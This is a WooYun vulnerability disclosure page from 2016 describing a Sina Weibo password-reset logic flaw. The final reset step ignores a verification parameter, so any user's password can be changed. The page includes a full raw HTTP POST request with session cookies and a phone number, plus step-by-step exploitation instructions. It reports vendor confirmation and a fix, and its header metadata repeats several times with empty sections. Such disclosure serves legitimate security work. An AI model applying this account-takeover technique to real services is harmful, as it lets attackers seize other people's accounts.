新浪微博设计缺陷导致继续重置任意用户密码（狗哥大号躺枪）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0191035

漏洞标题：新浪微博设计缺陷导致继续重置任意用户密码（狗哥大号躺枪）

漏洞作者：路人甲

提交时间：2016-03-31 11:59

修复时间：2016-05-16 15:00

公开时间：2016-05-16 15:00

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-31：细节已通知厂商并且等待厂商处理中
2016-04-01：厂商已经确认，细节仅向厂商公开
2016-04-11：细节向核心白帽子及相关领域专家公开
2016-04-21：细节向普通白帽子公开
2016-05-01：细节向实习白帽子公开
2016-05-16：细节向公众公开

简要描述：

新浪微博设计缺陷导致继续重置任意用户密码（狗哥大号躺枪）
本来想再拿国民老公测试一下，想想算了，总这么玩太过分了

详细说明：

邮箱找回密码修改密码的链接如下：https://security.weibo.com/iforgot/setpwd?rand=xxx&v=xxx
修改密码的最后一步没有用到链接中的v参数

POST /iforgot/ajsetpwd HTTP/1.1
Host: security.weibo.com
Connection: keep-alive
Content-Length: 83
Accept: */*
Origin: https://security.weibo.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: https://security.weibo.com/iforgot/setpwd?rand=0368de8e6293fb188499986b2edc9747&v=6648f5b10e98fabc1f8f3ea487a40d1d
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: SINAGLOBAL=7621946109630.549.1458865578638; _s_tentry=wooyun.org; Apache=1577074479587.3948.1459154671768; ULV=1459154671823:2:2:1:1577074479587.3948.1459154671768:1458865578645; login_sid_t=af37df78d736a242c763e2765c89f691; WBStore=8b23cf4ec60a636c|undefined; un=18210058035; appkey=; SUHB=0pHxOfeAwXoecI; myuid=5890029338; SUB=_2AkMhpwLbdcPhrAZZkfgVzmLhb4VMywv0utX3NUbeEiczHBt_7j5nqSVohkN_Xd6h2GMktgHeKhkm5VWCoP0X1mfvQ3QV; SUBP=0033WrSXqPxfM72wWs9jqgMF55529P9D9W5zh7Ab4-USV8-gMNpxAHcX5JpVF020ehe0So-Reo-X; UOR=,,www.wooyun.org
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
p=ceshi123&rand=51b956f1568d0996cb60a1cb9370f9c5&randcode=0&entry=weibo&p1=ceshi123

而rand可在邮箱找回密码的过程中获取

利用步骤
1、找回密码，选择通过邮箱找回，一直走到向邮箱发送邮件的步骤
2、用找回密码过程中获取到的rand替换上面数据包中的rand，即可直接修改目标微博账号密码

漏洞证明：

狗哥躺枪

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-04-01 14:54

厂商回复：

感谢关注新浪安全，问题修复中。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0191035

漏洞标题：新浪微博设计缺陷导致继续重置任意用户密码（狗哥大号躺枪）

相关厂商：新浪

漏洞作者：路人甲

提交时间：2016-03-31 11:59

修复时间：2016-05-16 15:00

公开时间：2016-05-16 15:00

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0191035

漏洞标题：新浪微博设计缺陷导致继续重置任意用户密码（狗哥大号躺枪）

相关厂商：新浪

漏洞作者： 路人甲

提交时间：2016-03-31 11:59

修复时间：2016-05-16 15:00

公开时间：2016-05-16 15:00

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0191035"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云